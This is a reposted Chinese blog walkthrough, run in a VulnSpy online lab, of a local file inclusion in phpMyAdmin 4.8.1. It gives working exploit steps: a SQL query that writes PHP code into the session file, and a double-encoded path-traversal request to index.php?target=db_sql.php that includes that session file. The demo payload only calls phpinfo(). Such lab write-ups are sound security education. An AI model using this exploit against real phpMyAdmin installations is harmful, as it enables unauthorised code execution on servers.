phpMyAdmin 4.8.x 最新版 本地文件包含漏洞利用

今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。

 

在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该漏洞的利用。

 

VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.com/phpmyadmin-4.8.1/

漏洞细节

参照ChaMd5安全团队发布的文章:phpmyadmin4.8.1后台getshell

漏洞利用

因为原文中包含数据库文件可能由于文件权限或者帐号权限不足而无法利用,这里我们将使用另外一种方式来利用该文件包含漏洞,即包含session文件。

 

1. 进入VulnSpy 在线 phpMyAdmin 环境地址,点击 Start to Hack ,跳转到VSPlate

 

vulnspy

 

2. 等待载入设置后,点击 GO 按钮开启实验

 

vulnspy

 

3. 实验创建完成后,点击演示地址进入实验

 

vulnspy

 

4. 使用帐号 root ,密码 toor 登录 phpMyAdmin

 

vulnspy

 

5. 点击顶部导航栏中的SQL按钮,执行SQL查询

1
select  '<?php phpinfo();exit;?>'

vulnspy

 

6. 获取自己的SESSION ID

 

你的 SESSION ID 为 Cookie 中的 phpMyAdmin 项。

 

vulnspy

 

这样对应的SESSION文件为/var/lib/php/sessions/sess_你的SESSION ID

 

7. 包含SESSION文件,成功利用该漏洞

1
http: / / 1a23009a9c9e959d9c70932bb9f634eb .vsplate.me / index.php?target = db_sql.php % 253f / .. / .. / .. / .. / .. / .. / .. / .. / var / lib / php / sessions / sess_11njnj4253qq93vjm9q93nvc7p2lq82k

vulnspy

 

本文转载自:phpMyAdmin 4.8.x LFI Exploit - http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/

  • 0
    点赞
  • 0
    评论
  • 4
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

打赏
文章很值,打赏犒劳作者一下
相关推荐
©️2020 CSDN 皮肤主题: 编程工作室 设计师:CSDN官方博客 返回首页

打赏

Ambulong

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值